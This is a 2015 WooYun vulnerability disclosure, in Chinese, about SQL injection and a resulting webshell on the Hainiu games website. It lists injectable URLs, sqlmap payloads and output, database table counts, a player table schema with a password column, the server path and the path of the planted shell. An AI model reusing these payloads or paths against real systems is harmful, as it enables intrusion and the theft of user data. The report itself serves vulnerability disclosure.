当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144740

漏洞标题:海牛旗下所有游戏官网通用GETSHELL并存在SQL注入可导致海量用户信息泄露

相关厂商:海牛游戏

漏洞作者: 路人甲

提交时间:2015-10-04 14:43

修复时间:2015-11-18 14:44

公开时间:2015-11-18 14:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

海牛旗下所有游戏官网通用GETSHELL,存在SQL注入,百万用户信息泄露

详细说明:

海牛游戏官网http://www.u591.com/
他的所有子目录都是他旗下的游戏
【首先是SQL注入】
和通用一样,举出几个例子
http://www.u591.com/sw/news.php?id=1634
http://www.u591.com/lw/news_list.php?TypeID=41
http://www.u591.com/tw/news_list.php?ntype=6
http://www.u591.com/newpay/index.php?game_id=2
【sqlmap截图】:

2.jpg


【| u_player1 | 476085 是用户数据库】可以看出有50w用户量,所有游戏加起来,至少几百万用户量
数据库信息

Database: u591
+---------------------+---------
| Table               | Entries
+---------------------+---------
| u_code_exchange     | 3918025
| pay_log             | 923359
| u_emoney1           | 889739
| u_player1           | 476085
| cpa                 | 330352
| u_delplayer1        | 241678
| u_delplayer13       | 234778
| u_delplayer8        | 204292
| u_delplayer16       | 102360
| account             | 70736
| emoney1             | 65844
| u_emoney5           | 43306
| u_delplayer302      | 31632
| u_delplayer18       | 31613
| pay_sms             | 23660
| u_emoney4           | 20247
| u_emoney2           | 17496
| u_emoney3           | 16719
| fenbaouser          | 15749
| u_itemtype          | 13137
| u_delplayer305      | 12886
| u_delplayer301      | 11044
| code_account        | 11000
| u_delplayer19       | 8097
| lw_u_player1        | 6027
| code_log            | 4114
| u_code_exchange_bak | 4056
| account_limit_log   | 3640
| u_delplayer306      | 3376
| lw_u_delplayer1     | 3083
| news_data           | 1545
| add_good            | 887
| u_charts_player     | 709
| u_card              | 532
| lw_add_good         | 244
| kf_message          | 236
| key_value           | 113
| pay_91              | 109
| kf_reply            | 95
| news_class          | 70
| client_data         | 67
| account_ip_error    | 56
| lw_u_vipgoods       | 49
| change_pay_log      | 33
| down_class          | 24
| user_fenbao         | 17
| link_data           | 14
| admin_user          | 8
| online_4399         | 6
| client_ver          | 4
| idfa_app            | 3
| publicity           | 3
| artificial_vip      | 2
| bug_message         | 2
| sent_message        | 2
| u_code_businesses   | 2
| app_sent            | 1
+---------------------+---------


Database: u591
Table: u_player1
[93 columns]
+-------------------+-------------------------------
| Column            | Type
+-------------------+-------------------------------
| level             | tinyint(1) unsigned
| position          | tinyint(3) unsigned
| account           | varchar(7)
| account_id        | int(4) unsigned
| additional_point  | smallint(2) unsigned
| attr              | int(4) unsigned zerofill
| auto_exercise     | tinyint(4) unsigned zerofill
| auto_point        | tinyint(1) unsigned
| bfcrystal1        | int(4) unsigned
| bfcrystal2        | int(4) unsigned
| bfcrystal3        | int(4) unsigned
| big_badluck       | tinyint(1) unsigned
| card_id           | int(4) unsigned
| chk_sum           | int(4) unsigned
| clan_proffer      | int(4) unsigned
| coin_money        | int(4) unsigned
| crystal_usage     | int(4) unsigned
| current_life_max  | int(4) unsigned
| dark_rate         | tinyint(1)
| data_num          | tinyint(1) unsigned zerofill
| Defense_point     | smallint(2) unsigned
| dexiterity        | smallint(2) unsigned
| dodge             | smallint(2) unsigned
| earth_element     | smallint(2) unsigned zerofill
| emoney            | int(4) unsigned
| eud_bag_size      | tinyint(1) unsigned
| eud_storage_limit | tinyint(1) unsigned
| exp               | int(4) unsigned
| exp_ball_usage    | smallint(2) unsigned
| ext_package_size  | tinyint(1) unsigned
| extra_point       | int(4) unsigned
| fire_element      | smallint(2) unsigned zerofill
| fire_rate         | tinyint(1)
| flower            | int(4) unsigned
| geomancy          | int(4) unsigned
| god_status        | int(4) unsigned
| godexp            | int(4) unsigned zerofill
| gold_element      | smallint(2) unsigned zerofill
| governproffer     | smallint(2) unsigned
| grid_amount       | smallint(2) unsigned
| grid_lev          | smallint(2) unsigned
| hair              | smallint(2) unsigned
| health            | smallint(2) unsigned
| holy_rate         | tinyint(1)
| horse_bag_size    | tinyint(1) unsigned
| ice_rate          | tinyint(1)
| id                | int(4) unsigned
| impart_num        | int(4) unsigned
| intellect_point   | smallint(2) unsigned
| last_login        | int(8) unsigned
| last_logout       | int(4) unsigned zerofill
| life              | int(4) unsigned
| Life_point        | smallint(2) unsigned
| lock_key          | int(10) unsigned
| lookface          | int(4) unsigned
| magic_atk         | int(4) unsigned
| mana              | smallint(2) unsigned
| marry_id          | int(4) unsigned zerofill
| money             | int(4) unsigned
| money_saved       | int(4) unsigned
| mora              | int(4) unsigned zerofill
| name              | varchar(7)
| num_kill_small    | int(4) unsigned
| old_prof          | smallint(2) unsigned
| online_time       | tinyint(4) unsigned zerofill
| password          | varchar(7)
| pk                | int(4)
| popularity        | int(4) unsigned
| profession        | tinyint(2) unsigned
| reborn_times      | tinyint(1) unsigned
| recordmap_id      | int(4) unsigned
| recordx           | smallint(2) unsigned
| recordy           | smallint(2) unsigned
| reserve_money     | int(4) unsigned
| small_badluck     | tinyint(1) unsigned
| soul              | smallint(2) unsigned
| sp                | smallint(2) unsigned
| Speed_point       | smallint(2) unsigned
| stamina           | smallint(2) unsigned
| storage_lev       | tinyint(1) unsigned zerofill
| strength          | smallint(2) unsigned
| strength_point    | smallint(2) unsigned
| student_finished  | int(4) unsigned
| syndicate_id      | int(4) unsigned
| task_mask         | int(4) unsigned zerofill
| thunder_rate      | tinyint(1)
| title             | int(4) unsigned
| vigor             | smallint(2) unsigned
| vitality          | smallint(2) unsigned
| water_element     | smallint(2) unsigned zerofill
| wind_rate         | tinyint(1)
| wood_element      | smallint(2) unsigned zerofill
| workload          | smallint(2) unsigned
+-------------------+-------------------------------


【GETSHELL来了】
因为是DBA权限:

1.jpg


通过SQL注入报错信息得知网站根目录 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in E:\wamp\www\www\inc\function.php on line 208
利用sqlmap的--os-shell 直接getshell

4.jpg


SHELL地址:http://www.u591.com:80/inc/tmpulkll.php
因为注入通用,所以getshell通用,因为游戏都在二级目录下,所以直接拿到官网shell

漏洞证明:

sqlmap全过程

[11:58:51] [INFO] testing connection to the target URL
[11:58:52] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[11:58:53] [INFO] target URL is stable
[11:58:53] [INFO] testing if GET parameter 'id' is dynamic
[11:58:53] [INFO] confirming that GET parameter 'id' is dynamic
[11:58:53] [INFO] GET parameter 'id' is dynamic
[11:58:53] [INFO] heuristic (basic) test shows that GET parameter 'id' might be
injectable (possible DBMS: 'MySQL')
[11:58:54] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you
want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'MySQL' extending provided level (1) and ri
sk (1) values? [Y/n]
[11:58:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:58:58] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHER
E or HAVING clause' injectable
[11:58:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[11:58:58] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
 (EXTRACTVALUE)'
[11:58:58] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
 (UPDATEXML)'
[11:58:59] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or HAVING clause
 (BIGINT UNSIGNED)'
[11:58:59] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause
'
[11:58:59] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[11:58:59] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[11:59:00] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(UPDATEXML)'
[11:59:00] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause
(BIGINT UNSIGNED)'
[11:59:00] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[11:59:00] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[11:59:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[11:59:01] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[11:59:01] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[11:59:01] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT
UNSIGNED)'
[11:59:01] [INFO] testing 'MySQL inline queries'
[11:59:01] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:59:01] [WARNING] time-based comparison requires larger statistical model, pl
ease wait...
[11:59:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[11:59:02] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:59:13] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based
blind' injectable
[11:59:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:59:13] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[11:59:13] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[11:59:14] [INFO] target URL appears to have 7 columns in query
[11:59:15] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 colu
mns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N]
sqlmap identified the following injection points with a total of 41 HTTP(s) requ
ests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1634 AND 1530=1530
    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: id=1634 UNION ALL SELECT NULL,NULL,CONCAT(0x716b7a6271,0x704f4a5056
4871726d50,0x7178787071),NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1634 AND SLEEP(5)
---
[11:59:39] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 5.0.11

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝